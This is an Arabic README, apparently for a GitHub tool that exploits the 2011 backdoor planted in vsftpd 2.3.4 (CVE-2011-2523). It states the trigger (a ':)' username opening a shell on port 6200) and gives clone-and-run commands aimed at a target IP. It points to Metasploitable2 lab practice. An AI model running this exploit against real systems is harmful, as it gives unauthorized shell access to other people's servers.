
استغلال Python لـ vsftpd 2.3.4 - تنفيذ أوامر الباب الخلفي
vsftpd، وهو اختصار لـ Very Secure FTP Daemon، هو خادم FTP للأنظمة الشبيهة بيونكس (Unix-like)، بما في ذلك لينكس. وهو مرخّص بموجب رخصة جنو العمومية (GPL). يدعم IPv6 و SSL.
في يوليو 2011، اكتُشف أن الإصدار 2.3.4 من vsftpd القابل للتنزيل من الموقع الرئيسي قد تم اختراقه. يمكن للمستخدمين الذين يسجلون الدخول إلى خادم vsftpd-2.3.4 المخترق إدخال :) كاسم مستخدم والحصول على شل أوامر على المنفذ 6200. لم تكن هذه مشكلة ثغرة أمنية في vsftpd، بل قام شخص ما برفع نسخة مختلفة من vsftpd تحتوي على باب خلفي (backdoor). ومنذ ذلك الحين، تم نقل الموقع إلى Google App Engine.
sudo apt update
sudo apt install python3
sudo apt install python3-pip
pip install argparse
git clone https://github.com/padsalatushal/CVE-2011-2523.git
cd ./CVE-2011-2523
chmod +x exploit.py
python3 exploit.py -host Target_IP
مثال : python3 exploit.py -host 192.168.168.128

يمكنك اختبار الاستغلال على Metasploitable2
https://www.computersecuritystudent.com/SECURITY_TOOLS/METASPLOITABLE/EXPLOIT/lesson8/index.html https://subscription.packtpub.com/book/networking_and_servers/9781786463166/1/ch01lvl1sec18/vulnerability-analysis-of-vsftpd-2-3-4-backdoor